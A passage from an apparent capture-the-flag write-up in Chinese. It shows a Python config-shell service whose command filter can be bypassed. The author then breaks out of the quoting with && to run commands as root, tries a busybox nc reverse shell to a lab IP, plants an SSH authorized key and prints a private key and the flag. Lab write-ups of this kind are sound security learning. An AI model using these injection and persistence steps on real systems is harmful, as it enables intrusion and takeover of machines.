return f"Error reading config: {str(e)}"
def write_config(data):
try:
if not re.match(r'^[a-zA-Z0-9\s:._-]+$', data):
return "Error: Invalid characters in input."
with open(CONFIG_FILE, "a") as f:
f.write(f"{data}\n")
return f"Written to config: {data}"
except Exception as e:
return f"Error writing config: {str(e)}"
def list_files():
try:
files = os.listdir("/opt")
return "Files in /opt:\n" + "\n".join(files)
except Exception as e:
return f"Error listing files: {str(e)}"
def check_status():
return """Service Status:
- Running: Yes
- Security: Advanced input validation enabled
- Log: Active
- Note: Command execution restricted to safe commands"""
def exec_cmd(cmd, client_addr):
if re.search(r'[;|<>]', cmd):
log_action(f"Blocked suspicious input: {cmd}", client_addr)
return "Error: Forbidden characters (;|&<>) detected."
allowed_cmds = ["whoami", "pwd", "date", "id"]
base_cmd = cmd.split("'")[0].strip()
if base_cmd not in allowed_cmds:
log_action(f"Invalid command: {cmd}", client_addr)
return f"Error: '{base_cmd}' not in allowed commands: {', '.join(allowed_cmds)}"
try:
full_cmd = f"sh -c '{cmd}'"
log_action(f"Executing command: {full_cmd}", client_addr)
result = subprocess.run(full_cmd, shell=True, capture_output=True, text=True, timeout=5)
return result.stdout or result.stderr or "Command executed."
except subprocess.TimeoutExpired:
return "Error: Command timed out."
except Exception as e:
return f"Error executing command: {str(e)}"
def show_help():
return """=== Configuration Shell ===
?/help List available commands
q/quit Exit the shell
read_config Read server configuration
write_config Write to server configuration
list_files List files in /opt directory
check_status Check server status
exec_cmd Execute allowed system commands (e.g., whoami, pwd)
"""
def handle_client(client_socket, client_addr):
client_socket.send(b"conf> ")
while True:
try:
data = client_socket.recv(1024).decode().strip()
if not data:
break
log_action(f"Received: {data}", client_addr)
parts = data.split(maxsplit=1)
command = parts[0].lower() if parts else ""
args = parts[1] if len(parts) > 1 else ""
if command in ("?", "help"):
response = show_help()
elif command in ("q", "quit"):
client_socket.send(b"Goodbye.\n")
break
elif command == "read_config":
response = f"Running 'cat {CONFIG_FILE}'\n{read_config()}"
elif command == "write_config":
response = write_config(args) if args else "Error: write_config requires an argument."
elif command == "list_files":
response = list_files()
elif command == "check_status":
response = check_status()
elif command == "exec_cmd":
response = exec_cmd(args, client_addr) if args else "Error: exec_cmd requires an argument."
else:
response = "Unknown command. Type 'help' for commands."
client_socket.send(f"{response}\nconf> ".encode())
except Exception as e:
client_socket.send(f"Error: {str(e)}\nconf> ".encode())
def main():
init_files()
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(("0.0.0.0", 12345))
server.listen(5)
print("Server listening on port 12345...")
while True:
try:
client_socket, addr = server.accept()
print(f"Connection from {addr}")
handle_client(client_socket, addr)
client_socket.close()
print(f"Connection from {addr} closed")
except KeyboardInterrupt:
print("\nShutting down server...")
break
except Exception as e:
print(f"Server error: {str(e)}")
server.close()
if __name__ == "__main__":
main()没有真的禁用掉&。。。。。
conf> exec_cmd whoami' && ls -la && '
root
total 12
drwxr-xr-x 2 root root 4096 Jun 20 13:30 .
drwxr-xr-x 18 root root 4096 Mar 18 20:37 ..
-rw-r--r-- 1 root root 0 Jun 20 13:30 server.conf
-rw-r--r-- 1 root root 2669 Jun 25 21:38 server.log没报错就是好事。。
conf> exec_cmd whoami' && ls -la /root && '
root
total 52
drwx------ 6 root root 4096 Jun 21 05:10 .
drwxr-xr-x 18 root root 4096 Mar 18 20:37 ..
-rwxr-xr-x 1 root root 5307 Jun 20 10:09 12345.py
lrwxrwxrwx 1 root root 9 Mar 18 21:18 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 4 root root 4096 Apr 4 22:04 .cache
-rw-r--r-- 1 root root 272 Jun 21 05:08 congrats.txt
drwx------ 3 root root 4096 Apr 4 21:00 .gnupg
drwxr-xr-x 3 root root 4096 Mar 18 21:04 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 44 Jun 20 10:12 root.txt
drw------- 2 root root 4096 Apr 4 23:57 .ssh
-rw------- 1 root root 0 Jun 21 05:10 .viminfo
-rw------- 1 root root 51 Jun 21 00:26 .Xauthority
conf> exec_cmd whoami' && ls -la /root/.ssh && '
root
total 8
drw------- 2 root root 4096 Apr 4 23:57 .
drwx------ 6 root root 4096 Jun 21 05:10 ..
conf> exec_cmd whoami' && /usr/bin/busybox nc -e /bin/bash 192.168.10.107 2345 && ‘
/bin/sh: 1: Syntax error: Unterminated quoted string
conf> exec_cmd id' && pwd && '
uid=0(root) gid=0(root) groups=0(root)
/opt
conf> exec_cmd id' && ssh-keygen -t rsa -b 4096 -f /root/.ssh/id_rsa -N "" -q && '
uid=0(root) gid=0(root) groups=0(root)
conf> exec_cmd id' && ls -la /root/.ssh && '
uid=0(root) gid=0(root) groups=0(root)
total 16
drw------- 2 root root 4096 Jun 25 21:52 .
drwx------ 6 root root 4096 Jun 21 05:10 ..
-rw------- 1 root root 3369 Jun 25 21:52 id_rsa
-rw-r--r-- 1 root root 736 Jun 25 21:52 id_rsa.pub
conf> exec_cmd id' && mv /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys && '
uid=0(root) gid=0(root) groups=0(root)
conf> exec_cmd id' && ls -la /root/.ssh && '
uid=0(root) gid=0(root) groups=0(root)
total 16
drw------- 2 root root 4096 Jun 25 21:53 .
drwx------ 6 root root 4096 Jun 21 05:10 ..
-rw-r--r-- 1 root root 736 Jun 25 21:52 authorized_keys
-rw------- 1 root root 3369 Jun 25 21:52 id_rsa
conf> exec_cmd id' && cat /root/.ssh/id_rsa && '
uid=0(root) gid=0(root) groups=0(root)
-----BEGIN OPENSSH PRIVATE KEY-----
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
QuWVT5lhi2xBAAAACnJvb3RAaG9zaGk=
-----END OPENSSH PRIVATE KEY-----
conf> q
Goodbye.
root@hoshi:~# cat congrats.txt root.txt
Congratulations, Hacker!
You've successfully pwned this target machine! 🎉
Your skills are top-notch, and you've earned ultimate bragging rights.
Keep hacking, keep learning, and check out more challenges at maze-sec.com!
See you in the next challenge!
- Sublarge
flag{root-5de923e57adefd6a1fd53a6705ad6486}
